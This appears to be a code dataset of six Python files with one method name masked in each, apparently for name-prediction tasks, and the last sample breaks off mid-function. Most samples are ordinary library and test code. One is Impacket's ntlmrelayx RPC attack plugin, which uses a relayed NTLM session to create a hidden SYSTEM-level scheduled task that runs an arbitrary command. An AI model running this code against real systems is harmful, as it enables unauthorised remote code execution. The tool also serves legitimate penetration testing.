label (string, 1-61 chars) | code (string, 4k-8k chars) | code_compressed (null)
---|---|---|
test loaded modules are loaded mods | """
Tests for salt.loader.lazy
"""
import sys
import pytest
import salt.loader
import salt.loader.context
import salt.loader.lazy
import salt.utils.files
@pytest.fixture
def loader_dir(tmp_path):
"""
Create a simple directory with a couple modules to load and run tests
against.
"""
mod_contents = """
def __virtual__():
return True
def set_context(key, value):
__context__[key] = value
def get_context(key):
return __context__[key]
"""
with pytest.helpers.temp_file(
"mod_a.py", directory=tmp_path, contents=mod_contents
), pytest.helpers.temp_file("mod_b.py", directory=tmp_path, contents=mod_contents):
yield str(tmp_path)
def test_loaders_have_uniq_context(loader_dir):
"""
Loaded functions run in the LazyLoader's context.
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
loader_2 = salt.loader.lazy.LazyLoader([loader_dir], opts)
loader_1._load_all()
loader_2._load_all()
assert loader_1.pack["__context__"] == {}
assert loader_2.pack["__context__"] == {}
loader_1["mod_a.set_context"]("foo", "bar")
assert loader_1.pack["__context__"] == {"foo": "bar"}
assert loader_1["mod_b.get_context"]("foo") == "bar"
with pytest.raises(KeyError):
loader_2["mod_a.get_context"]("foo")
assert loader_2.pack["__context__"] == {}
def test_loaded_methods_are_loaded_func(loader_dir):
"""
Functions loaded from LazyLoader's item lookups are LoadedFunc objects
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
fun = loader_1["mod_a.get_context"]
assert isinstance(fun, salt.loader.lazy.LoadedFunc)
def METHOD_NAME(loader_dir):
"""
Modules looked up as attributes of LazyLoaders are LoadedMod objects.
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
mod = loader_1.mod_a
assert isinstance(mod, salt.loader.lazy.LoadedMod)
def test_loaders_create_named_loader_contexts(loader_dir):
"""
    LazyLoaders create NamedLoaderContexts on the modules they load.
"""
opts = {"optimization_order": [0, 1, 2]}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
mod = loader_1.mod_a
assert isinstance(mod.mod, str)
func = mod.set_context
assert isinstance(func, salt.loader.lazy.LoadedFunc)
module_name = func.func.__module__
module = sys.modules[module_name]
assert isinstance(module.__context__, salt.loader.context.NamedLoaderContext)
wrapped_module_name = func.__module__
wrapped_module = sys.modules[wrapped_module_name]
assert isinstance(
wrapped_module.__context__, salt.loader.context.NamedLoaderContext
)
assert module is wrapped_module
def test_loaders_convert_context_to_values(loader_dir):
"""
LazyLoaders convert NamedLoaderContexts to values when instantiated.
"""
loader_context = salt.loader.context.LoaderContext()
grains_default = {
"os": "linux",
}
grains = salt.loader.context.NamedLoaderContext(
"grains", loader_context, grains_default
)
opts = {
"optimization_order": [0, 1, 2],
"grains": grains,
}
loader_1 = salt.loader.lazy.LazyLoader([loader_dir], opts)
assert loader_1.opts["grains"] == grains_default
# The loader's opts is a copy
assert opts["grains"] == grains
def test_missing_loader_from_salt_internal_loaders():
with pytest.raises(RuntimeError):
salt.loader._module_dirs(
{"extension_modules": "/tmp/foo"}, "missingmodules", "module"
)
def test_loader_pack_always_has_opts(loader_dir):
loader = salt.loader.lazy.LazyLoader([loader_dir], opts={"foo": "bar"})
assert "__opts__" in loader.pack
assert "foo" in loader.pack["__opts__"]
assert loader.pack["__opts__"]["foo"] == "bar"
def test_loader_pack_opts_not_overwritten(loader_dir):
opts = {"foo": "bar"}
loader = salt.loader.lazy.LazyLoader(
[loader_dir],
opts={"foo": "bar"},
pack={"__opts__": {"baz": "bif"}},
)
assert "__opts__" in loader.pack
assert "foo" not in loader.pack["__opts__"]
assert "baz" in loader.pack["__opts__"]
assert loader.pack["__opts__"]["baz"] == "bif" | null |
run | # Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2023 Fortra. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Authors:
# Arseniy Sharoglazov <[email protected]> / Positive Technologies (https://www.ptsecurity.com/)
# Based on @agsolino and @_dirkjan code
#
import time
import string
import random
from impacket import LOG
from impacket.dcerpc.v5 import tsch
from impacket.dcerpc.v5.dtypes import NULL
from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
PROTOCOL_ATTACK_CLASS = "RPCAttack"
class TSCHRPCAttack:
def _xml_escape(self, data):
        replace_table = {
            "&": "&amp;",
            '"': "&quot;",
            "'": "&apos;",
            ">": "&gt;",
            "<": "&lt;",
        }
return ''.join(replace_table.get(c, c) for c in data)
def _run(self):
# Here PUT YOUR CODE!
tmpName = ''.join([random.choice(string.ascii_letters) for _ in range(8)])
cmd = "cmd.exe"
args = "/C %s" % self.config.command
LOG.info('Executing command %s in no output mode via %s' % (self.config.command, self.stringbinding))
xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers>
<CalendarTrigger>
<StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
<Enabled>true</Enabled>
<ScheduleByDay>
<DaysInterval>1</DaysInterval>
</ScheduleByDay>
</CalendarTrigger>
</Triggers>
<Principals>
<Principal id="LocalSystem">
<UserId>S-1-5-18</UserId>
<RunLevel>HighestAvailable</RunLevel>
</Principal>
</Principals>
<Settings>
<MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
<DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
<StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
<AllowHardTerminate>true</AllowHardTerminate>
<RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
<IdleSettings>
<StopOnIdleEnd>true</StopOnIdleEnd>
<RestartOnIdle>false</RestartOnIdle>
</IdleSettings>
<AllowStartOnDemand>true</AllowStartOnDemand>
<Enabled>true</Enabled>
<Hidden>true</Hidden>
<RunOnlyIfIdle>false</RunOnlyIfIdle>
<WakeToRun>false</WakeToRun>
<ExecutionTimeLimit>P3D</ExecutionTimeLimit>
<Priority>7</Priority>
</Settings>
<Actions Context="LocalSystem">
<Exec>
<Command>%s</Command>
<Arguments>%s</Arguments>
</Exec>
</Actions>
</Task>
""" % (self._xml_escape(cmd), self._xml_escape(args))
LOG.info('Creating task \\%s' % tmpName)
tsch.hSchRpcRegisterTask(self.dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
LOG.info('Running task \\%s' % tmpName)
done = False
tsch.hSchRpcRun(self.dce, '\\%s' % tmpName)
while not done:
LOG.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
resp = tsch.hSchRpcGetLastRunInfo(self.dce, '\\%s' % tmpName)
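            # a non-zero year in the returned last-run time means the scheduled task has executed at least once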
if resp['pLastRuntime']['wYear'] != 0:
done = True
else:
time.sleep(2)
LOG.info('Deleting task \\%s' % tmpName)
tsch.hSchRpcDelete(self.dce, '\\%s' % tmpName)
LOG.info('Completed!')
class RPCAttack(ProtocolAttack, TSCHRPCAttack):
PLUGIN_NAMES = ["RPC"]
def __init__(self, config, dce, username):
ProtocolAttack.__init__(self, config, dce, username)
self.dce = dce
self.rpctransport = dce.get_rpc_transport()
self.stringbinding = self.rpctransport.get_stringbinding()
def METHOD_NAME(self):
# Here PUT YOUR CODE!
# Assume the endpoint is TSCH
# TODO: support relaying RPC to different endpoints
# TODO: support for providing a shell
# TODO: support for getting an output
if self.config.command is not None:
TSCHRPCAttack._run(self)
else:
LOG.error("No command provided to attack") | null |
images | # -*- coding: utf-8 -*-
"""
tmdbsimple.people
~~~~~~~~~~~~~~~~~
This module implements the People and Credits functionality of tmdbsimple.
Created by Celia Oakley on 2013-10-31.
:copyright: (c) 2013-2022 by Celia Oakley
:license: GPLv3, see LICENSE for more details
"""
from .base import TMDB
class People(TMDB):
"""
People functionality.
See: https://developers.themoviedb.org/3/people
"""
BASE_PATH = 'person'
URLS = {
'info': '/{id}',
'changes': '/{id}/changes',
'movie_credits': '/{id}/movie_credits',
'tv_credits': '/{id}/tv_credits',
'combined_credits': '/{id}/combined_credits',
'external_ids': '/{id}/external_ids',
'images': '/{id}/images',
'tagged_images': '/{id}/tagged_images',
'translations': '/{id}/translations',
'latest': '/latest',
'popular': '/popular',
}
def __init__(self, id=0):
super(People, self).__init__()
self.id = id
def info(self, **kwargs):
"""
Get the primary person details by id.
Supports append_to_response. Read more about this at
https://developers.themoviedb.org/3/getting-started/append-to-response.
Args:
language: (optional) ISO 639-1 code.
append_to_response: (optional) Append requests within the same
namespace to the response.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def changes(self, **kwargs):
"""
Get the changes for a person. By default only the last 24 hours are returned.
You can query up to 14 days in a single query by using the start_date
and end_date query parameters.
Args:
start_date: (optional) Filter the results with a start date.
Expected format is 'YYYY-MM-DD'.
            end_date: (optional) Filter the results with an end date.
Expected format is 'YYYY-MM-DD'.
page: (optional) Minimum 1, maximum 1000, default 1.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('changes')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def movie_credits(self, **kwargs):
"""
Get the movie credits for a person.
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('movie_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def tv_credits(self, **kwargs):
"""
Get the TV show credits for a person.
You can query for some extra details about the credit with the credit
method.
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('tv_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def combined_credits(self, **kwargs):
"""
Get the movie and TV credits together in a single response.
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('combined_credits')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def external_ids(self, **kwargs):
"""
Get the external ids for a person. We currently support the following external sources.
External Sources
- IMDB ID
- Facebook
- Freebase MID
- Freebase ID
- Instagram
- TVRage ID
- Twitter
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('external_ids')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def METHOD_NAME(self, **kwargs):
"""
Get the images for a person.
Args:
None
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('images')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def tagged_images(self, **kwargs):
"""
Get the images that this person has been tagged in.
Args:
language: (optional) ISO 639-1 code.
page: (optional) Minimum 1, maximum 1000, default 1.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('tagged_images')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def translations(self, **kwargs):
"""
Get a list of translations that have been created for a person.
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_id_path('translations')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def latest(self, **kwargs):
"""
Get the most newly created person. This is a live response and will
continuously change.
Args:
language: (optional) ISO 639-1 code.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_path('latest')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
def popular(self, **kwargs):
"""
Get the list of popular people on TMDb. This list updates daily.
Args:
language: (optional) ISO 639-1 code.
page: (optional) Minimum 1, maximum 1000, default 1.
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_path('popular')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response
class Credits(TMDB):
"""
Credits functionality.
See: https://developers.themoviedb.org/3/credits
"""
BASE_PATH = 'credit'
URLS = {
'info': '/{credit_id}',
}
def __init__(self, credit_id):
super(Credits, self).__init__()
self.credit_id = credit_id
def info(self, **kwargs):
"""
Get a movie or TV credit details by id.
Args:
None
Returns:
            A dict representation of the JSON returned from the API.
"""
path = self._get_credit_id_path('info')
response = self._GET(path, kwargs)
self._set_attrs_to_values(response)
return response | null |
get writer | # Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import csv
import logging
import os
import shutil
from csv import DictWriter
from typing import (
Any, Dict, FrozenSet,
)
from pyhocon import ConfigFactory, ConfigTree
from databuilder.job.base_job import Job
from databuilder.loader.base_loader import Loader
from databuilder.models.graph_serializable import GraphSerializable
from databuilder.serializers import neo4_serializer
from databuilder.utils.closer import Closer
LOGGER = logging.getLogger(__name__)
class FsNeo4jCSVLoader(Loader):
"""
Write node and relationship CSV file(s) that can be consumed by
Neo4jCsvPublisher.
It assumes that the record it consumes is instance of Neo4jCsvSerializable
"""
# Config keys
NODE_DIR_PATH = 'node_dir_path'
RELATION_DIR_PATH = 'relationship_dir_path'
FORCE_CREATE_DIR = 'force_create_directory'
SHOULD_DELETE_CREATED_DIR = 'delete_created_directories'
_DEFAULT_CONFIG = ConfigFactory.from_dict({
SHOULD_DELETE_CREATED_DIR: True,
FORCE_CREATE_DIR: False
})
def __init__(self) -> None:
self._node_file_mapping: Dict[Any, DictWriter] = {}
self._relation_file_mapping: Dict[Any, DictWriter] = {}
self._keys: Dict[FrozenSet[str], int] = {}
self._closer = Closer()
def init(self, conf: ConfigTree) -> None:
"""
        Initializes FsNeo4jCSVLoader by creating directories for node files
        and relationship files. Note that the directories defined in the
        configuration should not already exist.
:param conf:
:return:
"""
conf = conf.with_fallback(FsNeo4jCSVLoader._DEFAULT_CONFIG)
self._node_dir = conf.get_string(FsNeo4jCSVLoader.NODE_DIR_PATH)
self._relation_dir = \
conf.get_string(FsNeo4jCSVLoader.RELATION_DIR_PATH)
self._delete_created_dir = \
conf.get_bool(FsNeo4jCSVLoader.SHOULD_DELETE_CREATED_DIR)
self._force_create_dir = conf.get_bool(FsNeo4jCSVLoader.FORCE_CREATE_DIR)
self._create_directory(self._node_dir)
self._create_directory(self._relation_dir)
def _create_directory(self, path: str) -> None:
"""
        Validates that the directory does not exist, creates it, and registers
        a function that deletes the created directory with Job.closer.
:param path:
:return:
"""
if os.path.exists(path):
if self._force_create_dir:
LOGGER.info('Directory exist. Deleting directory %s', path)
shutil.rmtree(path)
else:
raise RuntimeError(f'Directory should not exist: {path}')
os.makedirs(path)
def _delete_dir() -> None:
if not self._delete_created_dir:
LOGGER.warning('Skip Deleting directory %s', path)
return
LOGGER.info('Deleting directory %s', path)
shutil.rmtree(path)
# Directory should be deleted after publish is finished
Job.closer.register(_delete_dir)
def load(self, csv_serializable: GraphSerializable) -> None:
"""
        Writes a Neo4jCsvSerializable into CSV files.
        This method writes multiple CSV files, because a record does not yield
        only a single node and relationship: it can yield several different
        kinds of nodes and relationships.
        Common pattern for both nodes and relations:
         1. retrieve the csv row (a dict where keys represent the header,
         values represent a row)
         2. use this dict to get the appropriate csv writer and write to it
         3. repeat 1 and 2
:param csv_serializable:
:return:
"""
node = csv_serializable.next_node()
while node:
node_dict = neo4_serializer.serialize_node(node)
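            # rows are grouped into one CSV file per (node label, set of record fields) so each file has a consistent header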
key = (node.label, self._make_key(node_dict))
file_suffix = '{}_{}'.format(*key)
node_writer = self.METHOD_NAME(node_dict,
self._node_file_mapping,
key,
self._node_dir,
file_suffix)
node_writer.writerow(node_dict)
node = csv_serializable.next_node()
relation = csv_serializable.next_relation()
while relation:
relation_dict = neo4_serializer.serialize_relationship(relation)
key2 = (relation.start_label,
relation.end_label,
relation.type,
self._make_key(relation_dict))
file_suffix = f'{key2[0]}_{key2[1]}_{key2[2]}_{key2[3]}'
relation_writer = self.METHOD_NAME(relation_dict,
self._relation_file_mapping,
key2,
self._relation_dir,
file_suffix)
relation_writer.writerow(relation_dict)
relation = csv_serializable.next_relation()
def METHOD_NAME(self,
csv_record_dict: Dict[str, Any],
file_mapping: Dict[Any, DictWriter],
key: Any,
dir_path: str,
file_suffix: str
) -> DictWriter:
"""
        Finds a writer based on the csv record and key.
        If the writer does not exist, it creates a csv writer and updates the
        mapping.
:param csv_record_dict:
:param file_mapping:
:param key:
:param file_suffix:
:return:
"""
writer = file_mapping.get(key)
if writer:
return writer
LOGGER.info('Creating file for %s', key)
file_out = open(f'{dir_path}/{file_suffix}.csv', 'w', encoding='utf8')
writer = csv.DictWriter(file_out, fieldnames=csv_record_dict.keys(),
quoting=csv.QUOTE_NONNUMERIC)
def file_out_close() -> None:
LOGGER.info('Closing file IO %s', file_out)
file_out.close()
self._closer.register(file_out_close)
writer.writeheader()
file_mapping[key] = writer
return writer
def close(self) -> None:
"""
        Closes any closeable callable registered in _closer.
:return:
"""
self._closer.close()
def get_scope(self) -> str:
return "loader.filesystem_csv_neo4j"
def _make_key(self, record_dict: Dict[str, Any]) -> int:
""" Each unique set of record keys is assigned an increasing numeric key """
return self._keys.setdefault(frozenset(record_dict.keys()), len(self._keys)) | null |
publish event | import json
import logging
import signal
from django.utils.functional import cached_property
from google.api_core.exceptions import AlreadyExists
from google.cloud import pubsub_v1
logger = logging.getLogger('zentral.core.queues.backends.google_pubsub.consumer')
class BaseWorker:
name = "UNDEFINED"
subscription_id = "UNDEFINED"
ack_deadline_seconds = None
counters = None
def __init__(self, topic, credentials):
self.topic = topic
self.credentials = credentials
# subscriber API
@cached_property
def subscriber_client(self):
self.log_debug("initialize subscriber client")
return pubsub_v1.SubscriberClient(credentials=self.credentials)
@cached_property
def subscription_path(self):
self.log_debug("build subscription path")
project_id = self.topic.split("/")[1]
return pubsub_v1.SubscriberClient.subscription_path(project_id, self.subscription_id)
def ensure_subscription(self):
self.log_debug("ensure subscription")
# create or update subscription
sub_kwargs = {
'name': self.subscription_path,
'topic': self.topic,
}
if self.ack_deadline_seconds is not None:
sub_kwargs["ack_deadline_seconds"] = self.ack_deadline_seconds
try:
self.subscriber_client.create_subscription(request=sub_kwargs)
except AlreadyExists:
self.log_info("subscription %s already exists", self.subscription_path)
# verify filter
config_filter = sub_kwargs.pop("filter", "")
response = self.subscriber_client.get_subscription(request={"subscription": self.subscription_path})
if response.filter != config_filter:
self.log_error("existing subscription %s has a different filter: '%s'",
self.subscription_path, response.filter)
raise ValueError
# update ack_deadline_seconds if necessary
config_ack_deadline_seconds = sub_kwargs.get("ack_deadline_seconds")
if config_ack_deadline_seconds and config_ack_deadline_seconds != response.ack_deadline_seconds:
self.log_info("update subcription %s ack_deadline_seconds", self.subscription_path)
subscription = pubsub_v1.types.Subscription(**sub_kwargs)
update_mask = pubsub_v1.types.FieldMask(paths=["ack_deadline_seconds"])
self.subscriber_client.update_subscription(
request={"subscription": subscription, "update_mask": update_mask}
)
else:
self.log_info("subscription %s created", self.subscription_path)
# metrics
def start_metrics_exporter(self, metrics_exporter):
if not self.counters:
self.log_error("Could not start metric exporters: no counters")
return
self.metrics_exporter = metrics_exporter
if self.metrics_exporter:
for name, label in self.counters:
self.metrics_exporter.add_counter(name, [label])
self.metrics_exporter.start()
def inc_counter(self, name, label):
if self.metrics_exporter:
self.metrics_exporter.inc(name, label)
# logging
def log(self, msg, level, *args):
logger.log(level, f"{self.name} - {msg}", *args)
def log_debug(self, msg, *args):
self.log(msg, logging.DEBUG, *args)
def log_error(self, msg, *args):
self.log(msg, logging.ERROR, *args)
def log_exception(self, msg, *args):
logger.exception(f"{self.name} - {msg}", *args)
def log_info(self, msg, *args):
self.log(msg, logging.INFO, *args)
# run
def do_handle_signal(self):
raise NotImplementedError
def handle_signal(self, signum, frame):
if signum == signal.SIGTERM:
signum = "SIGTERM"
elif signum == signal.SIGINT:
signum = "SIGINT"
self.log_debug("received signal %s", signum)
return self.do_handle_signal()
def do_run(self):
raise NotImplementedError
def run(self, metrics_exporter=None):
self.log_info("run")
self.exit_code = 0
# subscription
try:
self.ensure_subscription()
except ValueError:
self.exit_code = 1
else:
# signals
signal.signal(signal.SIGTERM, self.handle_signal)
signal.signal(signal.SIGINT, self.handle_signal)
# metrics
self.start_metrics_exporter(metrics_exporter)
self.do_run()
return self.exit_code
class Consumer(BaseWorker):
def __init__(self, topic, credentials):
super().__init__(topic, credentials)
self.pull_future = None
def shutdown(self, error=False):
self.log_info("shutdown")
if self.pull_future:
self.log_info("cancel pull future")
self.pull_future.cancel()
self.log_info("wait for pull future")
self.pull_future.result()
self.log_info("pull future shut down")
def callback(self, message):
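        # no-op placeholder; concrete consumers presumably override this to process pulled messages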
return
def do_handle_signal(self):
self.shutdown()
def do_run(self):
# async pull
self.log_info("start async pull")
self.pull_future = self.subscriber_client.subscribe(self.subscription_path, self.callback)
with self.subscriber_client:
try:
self.pull_future.result()
except Exception:
self.log_exception("Shutdown because of pull future exception")
self.exit_code = 1
self.shutdown()
class ConsumerProducer(Consumer):
def __init__(self, in_topic, out_topic, credentials):
super().__init__(in_topic, credentials)
self.out_topic = out_topic
@cached_property
def producer_client(self):
return pubsub_v1.PublisherClient(credentials=self.credentials)
def METHOD_NAME(self, event, machine_metadata):
message = json.dumps(event.serialize(machine_metadata=machine_metadata)).encode("utf-8")
kwargs = {"event_type": event.event_type}
if event.metadata.routing_key:
kwargs["routing_key"] = event.metadata.routing_key
self.producer_client.publish(self.out_topic, message, **kwargs) | null |
is running | import errno
import os
import shlex
import socket
import signal
import tempfile
import types
from subprocess import Popen
from time import sleep
import outer_packages
import jsonrpclib
# uses Unix sockets to determine whether a process is running.
# (assumes used daemons will register proper socket)
# all daemons should use -p argument as listening tcp port and check_connectivity RPC method
class SingletonDaemon(object):
# run_cmd can be function of how to run daemon or a str to run at subprocess
def __init__(self, name, tag, port, run_cmd, dir = None):
self.name = name
self.tag = tag
self.port = port
self.run_cmd = run_cmd
self.dir = dir
self.stop = self.kill # alias
if ' ' in tag:
raise Exception('Error: tag should not include spaces')
if dir and not os.path.exists(dir):
print('Warning: path given for %s: %s, does not exist' % (name, dir))
# returns True if daemon is running
def METHOD_NAME(self):
try:
            lock_socket = register_socket(self.tag) # the check is ~200000x faster and more reliable than checking via 'netstat' or 'ps' etc.
lock_socket.shutdown(socket.SHUT_RDWR)
lock_socket.close()
except socket.error: # Unix socket in use
return True
sleep(0.5)
        # Unix socket is not in use, but it might be an old version of the daemon that does not register a socket
return bool(self.get_pid_by_listening_port())
# get pid of running daemon by registered Unix socket (most robust way)
def get_pid_by_unix_socket(self):
ret_code, stdout, stderr = run_command('netstat -px')
if ret_code:
raise Exception('Error running netstat: %s' % [ret_code, stdout, stderr])
for line in stdout.splitlines():
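            # with '-p', netstat shows the owning 'PID/program' next to each socket; abstract sockets appear as '@<tag>' in the last column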
line_arr = line.strip().split()
if len(line_arr) == 8 and line_arr[0] == 'unix' and line_arr[4] == 'DGRAM' and line_arr[7] == '@%s' % self.tag:
return int(line_arr[6].split('/', 1)[0])
# get pid of running daemon by listening tcp port (for backward compatibility)
def get_pid_by_listening_port(self):
ret_code, stdout, stderr = run_command('netstat -tlnp')
if ret_code:
raise Exception('Error running netstat: %s' % [ret_code, stdout, stderr])
for line in stdout.splitlines():
line_arr = line.strip().split()
if len(line_arr) == 7 and line_arr[3] == '0.0.0.0:%s' % self.port:
if '/' not in line_arr[6]:
raise Exception('Expecting pid/program name in netstat line of using port %s, got: %s' % (self.port, line))
return int(line_arr[6].split('/')[0])
# get PID of running process, None if not found
def get_pid(self):
pid = self.get_pid_by_unix_socket()
if pid:
return pid
pid = self.get_pid_by_listening_port()
if pid:
return pid
def kill_by_signal(self, pid, signal_name, timeout):
os.kill(pid, signal_name)
poll_rate = 0.1
for i in range(int(timeout / poll_rate)):
if not self.METHOD_NAME():
return True
sleep(poll_rate)
# kill daemon, with verification
def kill(self, timeout = 15):
pid = self.get_pid()
if not pid:
raise Exception('%s is not running' % self.name)
# try Ctrl+C, usual kill, kill -9
for signal_name in [signal.SIGINT, signal.SIGTERM, signal.SIGKILL]:
if self.kill_by_signal(pid, signal_name, timeout):
return True
raise Exception('Could not kill %s, even with -9' % self.name)
# try connection as RPC client, return True upon success, False if fail
def check_connectivity(self, timeout = 15):
daemon = jsonrpclib.Server('http://127.0.0.1:%s/' % self.port, timeout = timeout)
poll_rate = 0.1
for i in range(int(timeout/poll_rate)):
try:
daemon.check_connectivity()
return True
except socket.error: # daemon is not up yet
sleep(poll_rate)
return False
# start daemon
    # returns True on success; raises if the daemon is already running or fails to start
def start(self, timeout = 20):
if self.METHOD_NAME():
raise Exception('%s is already running' % self.name)
if not self.run_cmd:
raise Exception('No starting command registered for %s' % self.name)
if type(self.run_cmd) is types.FunctionType:
self.run_cmd()
return
with tempfile.TemporaryFile() as stdout_file, tempfile.TemporaryFile() as stderr_file:
proc = Popen(shlex.split('%s -p %s' % (self.run_cmd, self.port)), cwd = self.dir, close_fds = True,
stdout = stdout_file, stderr = stderr_file)
if timeout > 0:
poll_rate = 0.1
for i in range(int(timeout/poll_rate)):
if self.METHOD_NAME():
break
sleep(poll_rate)
if bool(proc.poll()): # process ended with error
stdout_file.seek(0)
stderr_file.seek(0)
                        raise Exception('Run of %s ended unexpectedly: %s' % (self.name, [proc.returncode, stdout_file.read().decode(errors = 'replace'), stderr_file.read().decode(errors = 'replace')]))
                    elif proc.poll() == 0: # process launched another process and exited
break
if self.METHOD_NAME():
if self.check_connectivity():
return True
raise Exception('Daemon process is running, but no connectivity')
raise Exception('%s failed to run.' % self.name)
# restart the daemon
def restart(self, timeout = 15):
if self.METHOD_NAME():
self.kill(timeout)
sleep(0.5)
return self.start(timeout)
# provides a unique way to determine a running process; should be used inside the daemon
def register_socket(tag):
global lock_socket # Without this our lock gets garbage collected
lock_socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
try:
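        # the leading NUL byte binds an abstract-namespace Unix socket (Linux-specific), so no filesystem entry is created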
lock_socket.bind('\0%s' % tag)
return lock_socket
except socket.error:
raise socket.error('Error: process with tag %s is already running.' % tag)
# runs command
def run_command(command, timeout = 15, cwd = None):
    # pipes might get stuck, even with timeout
with tempfile.TemporaryFile() as stdout_file, tempfile.TemporaryFile() as stderr_file:
proc = Popen(shlex.split(command), stdout = stdout_file, stderr = stderr_file, cwd = cwd, close_fds = True)
if timeout > 0:
poll_rate = 0.1
for i in range(int(timeout/poll_rate)):
sleep(poll_rate)
if proc.poll() is not None: # process stopped
break
if proc.poll() is None:
proc.kill() # timeout
return (errno.ETIME, '', 'Timeout on running: %s' % command)
else:
proc.wait()
stdout_file.seek(0)
stderr_file.seek(0)
return (proc.returncode, stdout_file.read().decode(errors = 'replace'), stderr_file.read().decode(errors = 'replace')) | null |
test remote timeout to here in jit | from typing import Dict, Tuple
import torch
import torch.distributed.rpc as rpc
from torch import Tensor
from torch.distributed.rpc import RRef
from torch.testing._internal.dist_utils import (
dist_init,
worker_name,
wait_until_pending_futures_and_users_flushed
)
from torch.testing._internal.distributed.rpc.rpc_agent_test_fixture import (
RpcAgentTestFixture,
)
@torch.jit.script
def two_args_two_kwargs(
first_arg,
second_arg,
first_kwarg=torch.tensor([3, 3]),
second_kwarg=torch.tensor([4, 4]),
):
return first_arg + second_arg + first_kwarg + second_kwarg
@torch.jit.script
def script_rpc_async_call(
dst_worker_name: str, args: Tuple[Tensor, Tensor], kwargs: Dict[str, Tensor]
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs)
ret = fut.wait()
return ret
@torch.jit.script
def rpc_async_call_with_timeout(
dst_worker_name: str,
args: Tuple[Tensor, Tensor],
kwargs: Dict[str, Tensor],
timeout: float,
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs, timeout)
ret = fut.wait()
return ret
@torch.jit.script
def rpc_async_call_with_timeout_future_ret(
dst_worker_name: str,
args: Tuple[Tensor, Tensor],
kwargs: Dict[str, Tensor],
timeout: float,
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs, timeout)
return fut
@torch.jit.script
def rpc_async_call_future_ret(
dst_worker_name: str, args: Tuple[Tensor, Tensor], kwargs: Dict[str, Tensor]
):
fut = rpc.rpc_async(dst_worker_name, two_args_two_kwargs, args, kwargs)
return fut
@torch.jit.script
def rref_to_here(rref_var: RRef[Tensor]) -> Tensor:
return rref_var.to_here()
@torch.jit.script
def rref_to_here_with_timeout(rref_var: RRef[Tensor], timeout: float) -> Tensor:
return rref_var.to_here(timeout)
@torch.jit.script
def rpc_async_with_rref_arg(dst_worker_name: str, args: Tuple[RRef[Tensor]]) -> Tensor:
fut = rpc.rpc_async(dst_worker_name, rref_to_here, args)
ret = fut.wait()
return ret
class JitFaultyAgentRpcTest(RpcAgentTestFixture):
"""
Run tests for rpc_async in JIT under the faulty agent test fixture to test
arbitrary timeouts.
"""
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_timeout_in_torchscript_function(self):
# Call rpc_async + fut.wait() in torchscript function and ensure that
# timeout is raised.
if self.rank != 0:
return
dst_worker_name = worker_name((self.rank + 1) % self.world_size)
args = (torch.tensor([1, 1]), torch.tensor([2, 2]))
kwargs = {
"first_kwarg": torch.tensor([2, 2]),
"second_kwarg": torch.tensor([3, 3]),
}
expected_error = self.get_timeout_error_regex()
# Ensure that we get a timeout if we override the default timeout and
# the RPC takes longer to execute.
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc_async_call_with_timeout(dst_worker_name, args, kwargs, 0.5)
# Ensure that we timeout if we don't specify a timeout but the default
# is less than the RPC takes to execute.
rpc._set_rpc_timeout(0.001)
with self.assertRaisesRegex(RuntimeError, expected_error):
script_rpc_async_call(
dst_worker_name, args, kwargs
)
# Ensure that we run to completion if zero timeout is specified.
ret = rpc_async_call_with_timeout(dst_worker_name, args, kwargs, 0)
